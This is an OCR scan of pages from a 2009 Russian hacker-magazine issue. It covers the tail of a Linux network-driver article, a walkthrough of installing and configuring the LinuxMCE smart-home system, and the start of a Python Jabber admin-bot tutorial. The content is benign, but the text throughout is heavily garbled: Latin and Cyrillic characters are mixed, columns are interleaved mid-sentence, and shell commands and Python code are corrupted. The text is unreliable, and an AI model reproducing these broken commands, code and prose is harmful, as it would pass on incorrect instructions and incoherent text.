драйвер пfе. Если вместо имени ты увv!Ди шь слово «попе» строки inet - значит. ему не присвоен IP-адрес.Активиро­ TestDisk,
- значит, ядро не загрузило соответствующV1Й драйвер. вать интерфейс можно командой:
и пора отправляться на его поиски. Введи полное имя • Спасатель данных
устройства и название операЦV10ННОЙ системы в строку # ifconEig интерфейс inet IР-адрес пеtшаsk ddJescue - '!'L'NW.

ПОV1ска google. и ты найдешь и~я необходимого модуля сетевая-маска up gагlоfr.dе/kuгt/li nuxi

или сообщение о том. что данное устройство пока не под­ ddrescue.
держивается ядро". Обычно для выхода в локальную сеть не требуется ввод
Если Гlоиск драйвера не принес результатов, остае,.ся одно дефолтового шлюза. так что после исполнения этой команды • Утил ита nvclock­
- ждать выхода новой верси и ядра/ОС и надеяться. что в доступ клокальной сети должен открыться. В случае. если www.linuxhard'Nare.
нем появится поддерж~а твоего оборудования. Владельцы стандартный шлюз все-таки ИСГlользуется. выполни следую­ Q[g/nvclock.
неподдерживае~ых сетевых адаптеров ~oгyт попытать щую команду'

счастья с фре й м ворком N DISWra р рег. который представляет

• Прослойка
собой модуль ядра Linux. ОН реализует прослойку для работы
# route адд default gw IР-шлюза NDISWгаррег для

драйверов NDIS INetwork Driver IпLегfасе SpecificatlOГlI.

запуска сете в ых

предназначенныхдля Windows.
Твой провайдерможет V1спользоватьРРРоЕ илV1 РРТР-сер­ драйверов Windows
Установи naKeT пdiswгаррег. скопируй сдиска каталог с офи­
вердля предоставлениядоступа к интернету. - sourceforge.n~
циальны"Драйвером для Windows. найди в нем INF-файл и
Настройка подобных подключенV1Йбыла подробно !2.ШJеСls/пdiS\Nга ррег.
выполни зту Ko~~aHДY:
описана в статье «Прорыв сквозь РРР". опубликован­
ной в майс~ом номере за 2008 год. За сим я Гlрощаюсь
# ndis",rapper -i driver. inf Удачиl::I:

ХАКЕР оь /1261 09 ~ 087

 юрий "BOBER. РДЭ30РЕНОВ
/ZLOY.BOBRfaGMAIL.COM /

" "
МОИУМНЫИ

мОМ МОЯ

РЕПОСТЬ

Дистрибутив LinuxMCE: бесплатное решение для управления домом

Технология «умного дома» [Smart Но,те) уже не один год будоражит

умы как разработчиковсофта и железа, так и обычных пользова­
телей. Ведь в домах существуетбольшое количество самых раз­
нообразныхэлектронныхустройств, при этом никак не связанных
между собой. Если ты считаешь, что совместить их в единую сис­
тему очень дорого и под силутолько специалистамэкстра-класса,

тогда читай эту статью. Постараюсьтебя переубедить.

• ПРОЕКТ LINUXMCE
Название LinuxMCE !,vwwliПllXmсе.Dгg]
расшифровываетсякак Liпuх Media Center
EditlOn Можно с уееренностью предположить,
что этот дистрибути в позволяет n ревратить
обычный компьютер в современный домашний
развлекательный медиацентр [Ноте Theater
РС. НТРС! Но наэначениеLiпuхМСЕ гораздо
шире - Ноте АutоmаtlOП System, или полно­
функциональная система автоматизации дома I
потребуетсяспециальныйадаптер [для ТСР!
IP достаточно сетееухиl. Чтобы не запутаться
в одинаковых УСТРОЙСТ8ах. установленных
в разных комнатах. интерфейсупраеления
предлагает интерактивные планы помещений.
в которых пользователь может "расположить»
имеющиеся девайсы по своему усмотрению.
В качестве камер наблюдения можно исполь­
зовать обычную ееб-камеру. нолучше всегодля
этой цели подходят IP-камерbI, поддеРЖИ8аю­
обнаружени~ движени~ в поле зрения камеры
используется про грамма fvlоtiоп, речь о которой
шла в статье «Сумеречный дозор". опуБЛl1КО­
ванной в мартовском номерехэа 2008 год.
Продуманный механизм сценариев поз во­
л~ет легко объединить реакцию нескольких
yCTpoikTB на наступление определен ного
событияlcобытий или критериS1 [еремя суток.
ден ь недели]. При этом ПОЛЬЗ0ватель получает
очень гибкий механизм управлениS1 режимом

Она способна управлять всеми доступными щие различные вариантыудаленногоуправ­ работы системы охраны. Достаточноустано­

девайсами, начиная ОТ обычного (ну. не совсем] ления. да и цена на них сегодня уже перестала вить несколько вариантов. с помощью которых

выключателя света до устройств безопасности бытьзаоблачной. Аналоговая видеокамера определить. какдействовать системе в случае

[сигнализация и видеонаблюдение), а также
климат-контроля и бытовых приборов. Чтобы
включиться 8 единую систему. УСТРОЙСТ8а
должны уметь работать по протоколу ТСР!
IP. X1O.INSTEON. PLCBus. EI8!KNX. Z-Wave
цепл~етс~ через плату видеозахвата. Захвачен­
ное изображение с любой подключенной каме­
р ы можно просматривать в реал ьном времени.
записывать постоянно. по заданномуусловию
IBpeM~. движение. 380НОК 8 дверь и т.п.! или
возникновения тех или иных событий [поднять
тревогу, отправить SMS. позвонить на указанный
номер и т.д.!. Есл и помещение уже имеет гото­
Byю систему охра н ы. Li пuхМСЕ способен легко
интегрироваться и взаимодействовать с ней

или 1-Wlre. Для связи любого из нихс компом использовать комбинацию этих методов. Для Основой телефонии в LlпuхМСЕ являетсS1

~ 088 ХАК" 06 /126/ 09

cepBepAsterisk. Настройка параметров его
работы при помощи несколько измененного
FreePBX I'NWW. freepbx. ого) по нятна даже
человеку, далекому oTVoIP, и не займет много
времени. Для звонков с LinuxMCE на обычную
телефоннуюл и н ию понадобитсяАТА- адаптер
[либо РСТ-длата для аналоrовыхлиний
а-ля DigiШТI TDM410P с МОдУлем расши­
рения РХО - Прим. ред. J, а такжесофтофон
IXlite, Bria, EkigaJ или IР-телефон. Некоторые
модел и телефонов позволя ютупра влять всем И
настройками LinuxMCE со своего экрана. До­
сгупна функция follow-me !«следуй за мной»I,
обеспечивающаяавтоматическоеперена­
должна быть понятна и без перевода
правление вывода на различныеустройства,
к которы м подходитпол ьзователь, передвига­
ясь по помещениям. При выходе пользователя
из зоны управления система переключается
С Bluetooth на сотовую сеть IGPR5/WAPj, что
позволяет контролироватьдом и управлять им
практически на любом расстоянии.
ФункциональностьНТРС, в общем-то,
стандартна - проигрывание медиаконтента
Iфильмы, «живое» или записанное ТВ, музыка,
интернет-радио, фотки] с разных источни­
ков, сохранение файлов на диск, управле­
ние оборудованием при помощи IR Iчерез
трансмиттер GC1 001 или Bluetooth. Кроме того,
имеющиЙСЯ в ко мплекте 5li т5егуегkейча с ­
5queezeCen terJ поз воляеттра нсл и ровать ау­
диопото к на други е ком nOHeHTbI 5та rt Ноте.
Начало проекта датированофевралем 2007
года, когда через n ять месяцев работы на
Ubuntu была практически полностью [без
коммерческихмодулей ORM) портирована
система автоматизации Plutohome [построена
на Oeblan]. Последующv.е версии LinuxMCE в
качестве основы используют Kubuntu. Выбор
был продиктованбольшими возможностями
КОЕ по интеграции рабочих сред. Хотя нужно
отметить, что релизы МСЕ выходят гораздо
позже Kubuntu. Так, верси~ 0704, базирующа­
яся на Kubuntu 7.04, появилась в августе 2007
[Kubuntu - апрель], текущая стабильная 071 О
- в мае 2008. Как можно заметить, нумерация
LinuxMCE отражает версию Kubuntu, который
послужилосновой. Релиз 081 О находится на
данный момент в состоянии разработки, - это
первый релиз на КDЕ4.Х. Учитыва~ большое
I(оличество изменений, вносимых вдистрибут­
и в, при нято реш е н ие с верс и И 081 О iпла н и ру­
ется полностью решить все проблемы, связан­
ные с переходом на новый КОЕ) мигрировать
на годовой цикл 8ыхода дистрибутива.
СТРУКТУРА
SMART НОМЕ НА LINUXMCE
Прежде, чем приступить кболее подробному
обзору возможностейдистрибутива. позна­
комимся со специальнымитермина ми, - он и
помогут понять принципы
' на которых построен
LlnuxMCE. Сердцем и одновременно мозгом
всей системы является выделенный (и единст­
венный в сетиJ сервер Соге. На нем собственно
и работают сервисы, предоста8ляемыезти м
ХАКЕР 06 /126/ 09
решен ием. И менно1УТ настраиваются все виды
устройств и сервисов -1 p-телефоны
' камеры,
проигрыватели,ТV-тюнеры и пр. Компьютер
Соге должен бытьдостаточномощным, - на
его плечи 8ыпадаетсамая больша~ нагрузка
по обработке данных. Должно быть достаточно
СЛОТО8 расширения, чтобы подключить все уст­
ройства Также понадобится производительный
и eMKv.v. жесткий диск, хотя в качеСТ8е системы
хранения информации можно исnол ьзовать
выделенн ы й NA5-сервер. Соге предоставляет
все необходи мое для загрузки тонких !бездис­
ковыхl клиентов, которые затем используютс~ в
качестве Media Director' ов.
Media Olrector [или Media 5ta tlOпl- это обычный
компьютер, исполняющий роль медиа клиента,
непосредственно выводящего видео на зкран
телевизора или музы ку В колонки. Его можно
использоватьтакже в качестведесктопа Ic
Kubuntu!, персональноговидео рекордера IPVR].
домофона или для видеосвязи. Плюс на него
возложена задача поуправлению и мониторингу
за всем происход~щим в доме· предлагается со­
ответствующее зкранное меню, и подключаются
устройства управлений. Как правило, такие сис­
темы не нужда ются в жестком диске и загружают­
«MEDIA DIRECTOR - ЭТО ОБЫЧНЫЙ КОМ­
ПЬЮТЕР, ИСПОЛНЯЮЩИЙ РОЛЬ МЕДИ­
АКЛИЕНТА, НЕПОСРЕДСТВЕННО ВЫВО­
ДЯЩЕГО ВИДЕО НА ЭКРАН ТЕЛЕВИЗОРА
ИЛИ МУЗЫКУ В КОЛОНКИ. ЕГО МОЖНО
ИСПОЛЬЗОВАТЬ ТАКЖЕ В КАЧЕСТВЕ ДЕ­
СКТОПА (С KUBUNTU), ПЕРСОНАЛЬНОГО
ВИДЕО РЕКОРДЕРА
ДЛЯ ВИДЕОСВЯЗИ.».
c~ по сети, но никто не запрещает использовать
хард В 5тaгt Ноте может быть несколько Media
Oiгector' ов, установленных в разных комнатах
и подключенных к BbIXOAHblM устройствам. Сам
Соге-сервер может быть «чистым" или гибрид­
ным IHybrid), то есть быть еще и Media Оiгесtог'ом.
Hybrid - наверное, самый простой вариант
использования всей системы.
Графический интерфейс управлен ия Media
Diгесtог'ом и всеми устройствами «умного дома»
получил название Orblter. Он бывает нескольких
8идов:универсальный С веб-интерфейсом, поз­
воляющий управлять системой с любого КОМ па;
мобильный, представляющий собой телефон Iс
устаН08ленной SуmЫап или Microsoft Mobile) и
пордерживающий нужные функции , ПК или КП К,
подключенные через WiFi. Кроме того, в состав
Media Oirector'a входит«экранный»орбитер,
позволяющийулучшитьуправлениепри помощи
подключенной к системному блоку клавиатуры
или пультов дистанционного упра вления. Список
орбитеров, которые можно использовать сов­
местно с LlПuхМСЕ, приведен на страницеwiki.
linuxmce.ora/index. php/Ca legory:Orbiters. Нап ри­
мер, в качестве мобильногоорбитераподойдут
Nokra770/7650/6620/N800/N81 O,IPAQ 221 0/5550/
hx241 о, Cisco 7970 [XML-Orbiterl и др. Интерфейс
для подключенияновых устройствнаписа н на
Ruby. Orbiter переведен на несколькоязы ков и
пордерживаетразличныеварианты оформле­
ния. Русского в спискедоступныхязыков нет;
впрочем, большая часть используемыхтерминов
УСТАНОВКАLINUXMCE
Ориенти ровочные систем ные требован ия для
разных компонентов приведены в документе,
расположенном по адресу wlkl.llnuxmce.oro/
rndex.pho/Hard\Naгe.Естественно,для Соге и
Media Оiгесtогтребованияотличаются. Если не
предусмотрен захват и кодирование видеопо­
тока, то для Соге рекомендуемым минимумом
является компьютер класса Репtium-11173З М Гц
с 256 Мб RAM и 4 Гб хардом Iнепонятно почему,
у меня после установки всегда съедалось не
(PVR), ДОМОФОНА ИЛИ
менее 8,5 Гб]. Так как Medla Oirector'bl непос­
редственноучаствуютв выводе информации,
ДЛ~ них требуются качественные видео и
звуковые карты Разработчикирекомендуютис­
пользовать с LiпuхМСЕ платы от NVidia lGeForce
6200 - GeFoгce 8500J. Список TV-тюнеР08 и
карт захвата ты найдешь по ссылке 'В том числе
поддерживаютс~ и устройства, подкл ючаемые
noU5BJ.
Стабильная на момент написани~ этих
строк версия 071 О распространяется для
32- и 64-битныхредакций Kubuntu 7.10 (Gutsy
GrЬЬоп]. Вдальнейшем будем рассматривать
установку и настройку именно этого релиза.
Кстати, в конце марта I1стек срок поддержки
десктопных версий 'Ubuntu 7.1 О, позтому
обновлений к ним уже не предвидится.
На странице загрузки можно выбратьодин из
двух 8ариаНТ08 уста нов очного образа. Если уже
 У,СТАНОВКА
DVD-ВЕРСИИ
~ info
DОyo;Juа;И"''1IПIIОU51J~tм5со .... lоao:tЭ$3n>i1di~pI'''i''r7

~ 'I'М. I".. L";I" з11 t'h-e m'!dia pl~J'b;"k.nd remot~ cClIt.rol

,,- 5Q!tw;1re 31'1~ mЗ~С! thl$ compuler rr.'J МlLmed!B pla.yllГo
LINUXM'CE
НАОТДЕЛЬНЫЙ
• Для упрощения мы О "о. i'. use f.lher compule!i-.) and ОМо\ dt'l'lces(s) 10 pI~'ba(k
fI'I~~. Onlyinstall ~Me so~... ooth,! опое.

называем LiпuхМСЕ
дистрибутивом, хотя
на самом деле это ВО ВРЕМЯ УСТАНОВКИСЛЕДУЕТ ВЫБРАТЬ РАЗДЕЛ
свободное дополне­ РЕЖИМ CORE ИЛИ HYBRID
ние кдистрибутиву По умолчаниЮllpи использовании DVD инсталлятор
Kubuntu. забираетхард IЩIIНОСThЮ> nопyrнозатирал всю инфу.
Но есП> один трюк, позволяющий поставить DVD-Bep­
• Основой системы «В КАЧЕСТВЕ КАМЕР НА­ сию в отдельный раздел. Идея проста: нужно за(.'Тавить
автоматизации уcrаНОВlЦИкnоверить, что система уже есть, а значит,

в LinuxMCE является БЛЮДЕНИЯ ЛУЧШЕ ВСЕГО ее нужно просто оБНОВИTh. д.'IЯ этоro в отдельном
Pluto (Q\!J.tQhome разделе (лучше, чтобы это был /dev/sdal), отформа­
сот). Его код относи­ ПОДХОДЯТ IP-КАМЕРbI». тированномв одну из файловыхсистемLiпuх, создаем
тельно недавно стал KaTa~oг/etc, ав ием-nyстойфаЙJIp]uto.conf. Во время
доступен под GPL, устанОВКИ:llpограмманаходит / еtс/р!utо.сопfи пред­
хоп\ готовые реше­ естьдискс КuЬuпtu 7.10, можно остановиться на двух СО­ лагает обновить имеющуюся систему.
ния распространяют­ дисках, обозначенных соответственно LiпuхМСЕ-СОl-IЗ86­
ся под коммерческой rc2.iso и LlпuхМСЕ-СО2-i386-гс2.isо [для 64-битных систем 8

лицензией. имени будет п рисугствовап> amd64J. Они содержат пакеты для режиме будет работать наш сервер - НуЬпd [выбираем
конвертации системы в LinuxMCE. Здесь есть один нюанс­ YesJ или Соге (No, отказываемся от проигрыватеЛ51J. Если
• Основная фило­ это должна быть «свежая» система без ка ких-либо апдейтов на компьютере будет обнаружена видеокарта от NYidla,
софия LiпuхМСЕ [кстати, от интернета на время установки лучше отключиться, мастер предложитустановить проприетарные драйвера

выражена в девизе чтобы операционка чего не вытянула). Иrlаче инсталлятор [из интернета или с СО 11. Отказываться от этой процеду­
проекта: «Ifyou're LlnuxMCE может выдать ошибку и завершить работу. ры не стоит. Далее система пробует настроить сетевые

uSlng а Media Center Для «чистой» установки предназначен ОУО-диск Доступны интерфейсы при помощи ОНСР При желании выбираем
РС, It'S all about the два варианта - обычный 3,9 Гб и Oual Layer-7,0 Гб. Второй «No, i'll set ту пеtwогk optrons mапuаlLу» и устанавли­

media, stupid, поt the содержитдемо-видеохорошего качества. Надо сказать, ваем настройки вручную. Затем указываем зеркало, с
РС». польза отнего невелика, поэтому смысла качать не вижу. которого будет производиться обновление [в списке есть
ОУО устанавливаетсяне просто, а очень просто: достаточно и российское]. Поумолчанию на сервере стартует ОНСР­
• При запущенном выбратьжесткийдиск и ввести парольдляпользователя сервис, раздающий IP-аАреса в диапазоне ·192.168 80.1­
LlпuхМСЕдля пере­ linuxmce, который будет использоваться для доступа по 55Н. 192 168.80.254. Можно изменить эти настройки. Напри­
хода в Kubuntu нажи­ После чего все необходимые файлы скопируются нахард. В мер, если LinuxMCE будет единственнымхостом, тогда В
маем <Ctrl+Alt+F7> этом варианте будет использован весьдиск, данные на ко­ ОНСР нет необходимости.Теперь следует определиться
и <Ctrl+Alt+F11 > для тором уничтожатся. Вариант мультизагрузки изначально не стем, как будет использоватьсякомпьютер. При помощи
возвращения обрат­ предусмотрен; правда, инсталляторлегкообмануть !смотри переключателя выбираем один из двух предложенных
но в LlпuхМСЕ. врезку). вариантов.

Установке с СО тоже не сложна. Записывать скачанные • Ргimапlу used as а РС - по умолчанию загружается

• 25 ма рта 2009 года образы на диск необязательно. Ставим Kubuntu 7.10. затем Kubuntu, но можно переключиться в LinuxMCE:

завершена подде­ монтируем С01 из LlnuxMCE в каталог /mnt: • Adedlcated LinuxMCE - наоборот.

ржка ·UЬuпtu 7.10. Кстати. первый варианттакже можно использоватьна ком­

$ sudo mount Lil1\D:ИСЕ-СDl-iЗ86-rс2.iso /mnt -о loop пьютере, выполняющем роль Media Oirector·a и обычного

• Для установки десктопа

исходного кода и -устанавливаемнаходящийсявнутри пакет тсе­ На зтом все. Теперь мастер попроситуказать. где нахо­
LiпuхМСЕ выполни iпstаllег, дится СО 1/С02 и установочный Kubuntu 7.1 О Oesktop
кома нду «svn со Са м ый удобны й вариант - задать расположе н ие на харде
httр://svп .ll Пllхmсе. $ sudo dpkg -i /rmt/mce-il1staller_2. О .1-1_iЗ86 .д.еЬ соответствующих 150-0бразов, тогда можно начать процесс
соm/рlutо/tгuпk/ установки. оставить компьютер и заняться своими делами.

linuxmce» После этого на рабочем столе появится значок «Iпstаll Если выбрать "It's in СО Drive», придется последовательно
LlnuxMCE". Чтобы начать процесс установки, просто щел­ вставлять каждый диск в при вод. В Гlроцессе установки мо­
• Обзор Myth ТУ читай каем по нему Да, во время установки будут перезаписаны гут появляться сообщения об ошибках, обычно они возника­
в статье «Строим до­ некоторые системныефайлы. Всякое бывает. поэтому на ют при тестировании драйверов к различным устройствам,
машнюю медиастан­ «боевой» системе лучше не зкспериментировать. Если установка не закончена с Еггог. то на них обращать
цию» В июльском Установка выполнена в виде нелокализованногопоша­ внимание не стоит. на результат работы они не влияют По
номере журнала за гового мастера. В первом окне получаем сообщение о окончании будет запрошена перезагрузка.
2007 год. том. что обновление будет произво.циться из репозитария
LiпuхМСЕ [в Hel-l содержатся все необходимые пакетыl, НАСТРОЙКИ ПОСЛЕ ПЕРЕЗАГРУЗКИ
а не Ubuntu. Наэначениевторого шага, предлагаю­ Первая загрузка несколько затянется, поскольку будут
щего установить медиапроигрыватель.путает многих проверяться И дона страиваться все сервисы. Далее
На самом .целе здесь предстоит определиться, в каком запустится мастер настройки ау.цио и видео - «АУ

~ 090 ХАКЕР 00 11261 09

 1",1. '.liiЩ;'f·Ш.i1iщ.; ~-------,---~--­
l.ОСЭltоп ,e:dIt :!liew .IIаоlcп)Qr1cs 1001s 5.ettlngS' !::!elp
" ---.м)г:i;;-~--.,т­

Q Q. Q. Q 0: D G[hitP;1J12~_~~o.i~~to~dmlnti~:!~~~~_._ ...
~! ;;uпu.:чСЕ
Ba.slclnto -
! -­
W!.lold
--­ -
AdV/lП«11
- Att10П11111<111
--­SClI;UI
GRAPHICAL А5РЕСТ
~ STEP 2
\ШI1 'TolccolII
!1=
~ ~t ~y~ . . . . ~Ii<iQC.•. ri>+ Alph~ bl4n.JadUli,tHItI.<.
Devlc4i!5 But bt'ibt. (/'м:IO~"""t r(!~1'IO'" t~ w«l:s.;,nO tN P-4tJ'"~"",nt.,
~t ~.Itр:llp6utolIQП'I',"Q""....цt.n,j.~.рhp,\J1
о,"",
llilI.<Ш
~ Wlzard I LlghUng Scenarlos
~
Q!I<IW
МАСТЕР HOUSE SEТUP l.!9t!!>
!d:IJЫIO

N(){e: Tne nrst Ilghting scenario 1.. Ih.:: "Dеt3Шt Otl' 'аг th<Jt гоот, mеЗпing
lightingtaItO'N-У'1u, v.rn:n you еntег the room,lttattir1>1 sселзrjo-МII ое ex~

WIZARD ПОМОЖЕТ !то аtюп Р'У(")

~
OFF' v.t1~n уоч leave tne room. YOU SnOuld make ~ l'irи sce:natio tum о
second $сепаriO tumtnem ort. The restot the sc!!:гI3r1os сзп O~ aпylI\ing
Su!W~lance Саmегщ
СКОНФИГУРИРОВАТЬ
ПОДКЛЮЧЕННЫЕ УСТ­ '"""'"
ВJJшtl!!Jtl
GCDetlcserla!QrY!(~
ЕI99ш!зпWtzзrl1
Bzthroom
Aut:ag~e(<lted scenar1os: N/A

РОЙСТ8А sc:.naI105 но Ijgnting scenar10s tor Ihls roOnl.

ПОСЛЕУСТАНОВКИLINUXMCE
ВЕБ-КОНСОЛЬ УПРАВЛЕНИЯ LINUXMCE­ ЗАПУСТИТСЯ A!VWIZARD
ADMIN WEBSIТE

в 1-1 их можно запускать МСЕ, а также управлять некото­

рыми его параметрами и просматривать журналы Для

запуска LlnuxMCE во вкладке «5tart» нажимаем «5tart
LlпuхМСЕ» или ,,5tart Соге services», если НУЖI-1Ы только

сервисы, предоставляемыеСоге. Для автоматического

их старта при открытии Launch Manager просто уста 1-10­
ви флажки В поле «Autostart Sеttiпgs». Запуск займет
l-1еКОТОрое время, по прошествии которого заПУСТИ1'СЯ • официалы-1йй сайт
еще один мастер, на этот раз - House 5etup Wizard [в проекта LinuxMCE­
процессе эксплуатации его можно вызвать из меню «Misc liпuхmсе,огg.
- Advanced ОрtlОПS - Setup Wizard»]. На первом шаге
проверяются настройки видео и звука; если видно иэоб­ • WiKi проекта
ражеl-1ие, и слышеl-1 голос, нажимаем «Next>' и получаем LinuxMCE содержит
список устройств удаЛВНI-10ГО управлеl-1ИЯ. Далее мастер огромное количество

может разделиться на два: House Setup Wizard и Media информации - wiki.

ОРБИТЕР МОЖЕТ ИМЕТЬ НЕСКОЛЬКО ВА­ Player Wlzard. Первый помогает настроить использова­ [iпuxтсе.огg.
РИАНТОВИНТЕРФЕЙСОВ ние системы,ДЛЯ чего ПОl-1адобится ввести имя, выбрать

из списка страну, указать количество И l-1азначение • Неофициаль­

Wizard". Сам процесс состоитиз трех зтапов. разбитых KOMl-1ат, l-1астроить системы уп равления светом, безо­ I-1ЫЙ русский

на девять шагов. На настройки рабочего стола Kubuntu пасности, параметры VolP-провайдераи РVR-систему сайт LlnuxMCE­
зти установки никак l-1e влияют. - они действуют только (MythTV или VOR). Если некоторых устройств в системе lli1JlZ.D:!.<;.§.J:!J.
для LiпuхМСЕ. 8 последующем мастер можно запус­ нет, нажимаем «Contlnue without опе». Мастер укажет
тить повторно из меню LinuxMCE, выбрав Аdvапсеd ЛОГИI-1 и пароль для регистрации и получения готовой • Интерl-1ет-проект
- A!V Wlzard (или в ко маl-1ДНОЙ строке /u sr/plu to/bin/ почты. Теперь в Media РlауегWizагdдля каждой комнаты «УМI-1ЫЙ дом своими

AVWizard_Run.shl. Вl-1ачале при помощи трех окон указываем СIlИСОКУСТРОЙСТВ и методы управлеl-1Иfl ими, руками» - hosm.ru.
выбираем видеОИl-1терфейс[VGA. OVI/HDMI. S-Video На nослеДl-1ем шаге МОЖl-10 устаl-10ВИТЬ ряд программ

и такдалееl, разрешеl-1ие и частоту развертки. После
проверки правильностизтих установокбудет запрошен
выбор одного из трех вариантов Orbiter
IUI). Самый простой - "Static images, по overlay
(tlghtweightl" - не требователеl-1 к производителы-1стии
Iw32codecs, OVO С55 и другиеl. Если ПДУ дЛЯ какого-то
устройства отсутствует, нажимаем «Ооп'! сопtгоl ту ... »
User Interface И идеl~ дальше В процессе выбора устройств будут уста­
l-1авливаться все необходимые драйвера, при этом окно
сообщеl-1ИЙ будет чуть перекрывать рабочее поле мастера

видеоподсистемы и будет работать на всех платформах. [не очень УДОбноl. По окончан и и щел каем «Start using ~ warning
Наиболее ПРОДВИI-1УТЫЙ - «OpenGL with alpha blепdiпg the system». Для перехода в КuЬuпtu используем ссылку При установке DVO­
!high-endl» - потребует NVidia 6/7/8/9ххх с l-1e Mel-1ee 128 «КОЕ Oesktop» или нажимаем <Ctrl+Alt+F7>; если НУЖl-10 варианта LinuxMCE
Мб ОЗУ. После выбора одного из режимов с поддер­ вернуться обратно в LiпuхМСЕ - <Ctrt+Alt+F11 >. все данн ые на

жкой OpenGL нужно протестировать работу нажатием После установки доступен LiпuхМСЕ Admin Webslte, КОТО­ жестком диске будут
кнопки "Test". На шаге «Adjust Image 5ize" указываем PbIl~ можно открыть, обратившись по адресу http://core ip/ ун ичтожены, мулыи­

правильный размер изображения. Выбираем разъем, к pluto-adrnin или l-1ажав кнопку В Launch Manager. Отсюда загрузка систе"" не

которому подключены аУДИОКОЛОI-1КИ, и тестируем вывод можно произвести все настройки. о которых говорилось предусмотрена.

звука а обычном режиме, в Dolby и ОТ5 IOigital Theater ранее, и по ссылке l-1a первой странице скачать орбитеры
50uпd] - послеДl-1ие два будут достуПI-1Ы в зависимости для Windows и 1-1 eКOTopbl е другие утилиты.
от выбраl-1НОГО аудиоразъема. Попутно выставляем

нужную ГрОt-1КОСТЬ. Смотрим итог. Если все в порядке, ЗАКЛЮЧЕНИЕ

l-1ажимаем «1 agree» и ждем некоторое время, пока будут Возможностей у LiпuхМСЕ довольно MI-10ГО, позтому пер­
про изведены соответствующиедоустаl-10ВКИ. BOl-1ачальную настройку должен производить человек,
ТепеРЬТОЧl-10 все Если был выбран вариаI-1Т«РГtmаГllу как минимум понимающий, что ОН делает. Что касается

used as а РС". загрузится КОЕ, на рабочем столе которого последующей зксплуатации, то ol-1a не вызовет проблем

будет расположена иконка для запуска LinuxMCE Lаuпсh даже у чайника - выбирай устройство да l-1ажимай

Мапаgег. Менеджер содержит несколько вкладок,­ КI-10ПКИ!Х

ХАКЕР 06 /126/ 09 ~ 091

 +++

>> cod;ng

~
+++

РОМАН .. SPIRIT.. ХОМЕНКО

.+++
I НТТР:/ГТUТА'МС.СОМ I

"+++

.+++
----
-+++
---~

.+++
~
РОБОТ ~ а СХЕМДРДБОТЫДЖДББЕРД
IIH++

-+++
,ЛЯ
.+++

Программимкрутой jаЬЬег-ботс поддержкой

+++
плаГИНО8на Python'e

+++ Британские ученые давно доказали, что собственным джаббер-ботом

должен обладать любой уважающий себя администратор.

-+++ Еще бы, ведь это он спасет в экстремальной ситуации, когда под рукой
нет putty, зато есть джаббер-клиент [ты ведь уже завязал с аськой,
-+ ++ правда?].

Пришлотепло,а вместе С НИМ - " выезды на ноута/субноутанемысл"моll,но я оказался не от РегL·а. разв"тие которого де-факто пре­

.+++ природус шашлыками.И пока я смотрел на таков, и на зтом п"кн"кдля меня закончился. кращено) системный 'В отличие от вебовского
костер, предвкушая начало отдыха, зазво­ Вечером я вспомнил, что на телефоне у меня РНР) скр"птовый язык программирования.
н"л телефон (в соответстви"с пр"каэаМ!-1 он установленджаббер-месенджер,и, если бы на Выбор протокола сделать еще проще, ведь
должен быть при каждом сотруднике мили­ серваке присутствовалсоответствующийбот, у джаббера в этом плане нет конкурентов­

1'1-+++ ци" на случай 'гревог" "л" команды «сбор»I. который могбы исполнять его команды, летний аська не подходит ввиду отсутствия на'ГИВ­

3вон"л полковн"к,срочно вызывающийменя отдых бы не обломался. «Н"когда не поздно нога шифрования И цеНТРдлизованности lих
на работу и требующий выдать ему на серваке начать», - сказал себе я и принялся за работу. сервак может лежать или капиталистическое

новый пароль. Работы на пару минут, но где же начальство опять начнет что-то мутить со

+++ я в лесу достану комп с "нетом? Матерый гик PYTHON &JABBER сменой протокола].

портативнуюЭВМ себе, наверняка, найдети Почему Python? А потому, что зеленый змий Юзать на Питоне джаббер-протокол мож­

там (пить, гулять" морально разлагатьсябез - единственный развивающ"йся [в отличие нодвумя способами: простым и сложным.

! -+++ • 092 ХАКЕР 06 /1201 09


ЛОГО ДЖАББЕРА
Ьос '" Х(1)рр.Сliепt
getDomain{) ,debug=(j)
"Сложно» - зто путем чтения документации
ConfigParser.ConfigParser()
[xmggorg/rfesJ и с использованием сокетов.
config. теад ( 'config·. ini' )
Если хочешь разобраться с протоколом - зто
10gin = config. get ('
способ оптимален, советую посмотреть, как
'login')
сдела н бот от eLWAux [исходники есть на
password = config. get ( 'СОПпесс' ,
диске].
Легкий путь подразумевает использование
allow.J)asswor·d =
уже написанных библиотек Их немало, на­
config.get{'permission' ,
f1ример:
• 'l'wisted Words
(twistеШ"аtriх.соm!рrоjесts!wоrds);
• jabber.py
usеr_по-раss.sрlit('
(jabberpy.sourceforge.net) ;
• Х11\рррру
rеtщ:n ( '10gin' : lоgiп,
(xmpppy.sourceforge.net} .
'password ' :password,
Выбор определяется в основном личными при­
страстиями. Мне больше понравилась хтрррру
оТ Алексея Нежданова. Ею мы и ВОСГlOльзуе,кя.
АРХИТЕКТУРА
Итак, задача поставлена: написатьджаббер­
'бот, способный принимать и исполнять
команды. Нет, стой, зто слишком просто.
Усложним все и напишем полноценный бот
с поддержкой плаГИН08, один из которых и
решает задачу администрирований.
С истема у нас будет состоять из бота [Ьо t.
ру), файла конфигурации [сопflg.iпiJ, папки с
плагинами Ipluginsj и библиотеки хтррру. Бот
будет иметь два типа плагинов. Представи­
тели первой группы доступны всем, второй
лишь избранным, по списку или паролю.
При проектировании системы с плагинами
всегда встает вопрос об их полномочиях по
управлению ботом. С одной стороны, чем
меНЫliе прав плагину мы даем, тем проще
их писать, но и возможности получаются
более ограниченными Позтому пусть лучше
плагины будут низкоуровневыми Трудностей
мы не боимсй.
СИСТЕМА КОНФИГОВ
Программинг бота начнем с реализации
чтения конфига. который будетхраниться во
всем известном iпi-формате в файле config.
ini [кстати, амеры весело произносят«iпi» как
«аЙнаЙ»). В секции connect мы разместим па­
раметры доступа к ацаунту, на котором будет
висеть бот, а в секции perrrllsslon - список
ХАКЕР 06 11261 09
юзеров, имеющих доступ к админке Iпароли ЗАПУСК БОТА
будутхраниться там же!. Перейдем к использованию хтррру и эапуску
Удобную работу с IПI-файлами В Питоне обе­ бота. Сперва создадим объект Jid oTxmpp.J 10,
спечивает библиотека ConfigPar5er. Для чте­ передав имя пользователя, взятого из нашего
ния пара метров мы используем две функции загруженного конфига. Создание главного
оттуда. Первая, read - для чтения конфигура­ объекта bot проиэводится 01" xmpp.Client с пере­
ционного файла. и,~я которого передается как дачей домена, на котором находится юзер, и
параметр. Вторая функция, get, нужна, чтобы пустым списко,~, чтобы на экран не выводилась
достать какой-то параметр. Она принимает в отладочная информация [тру-хакеры работают
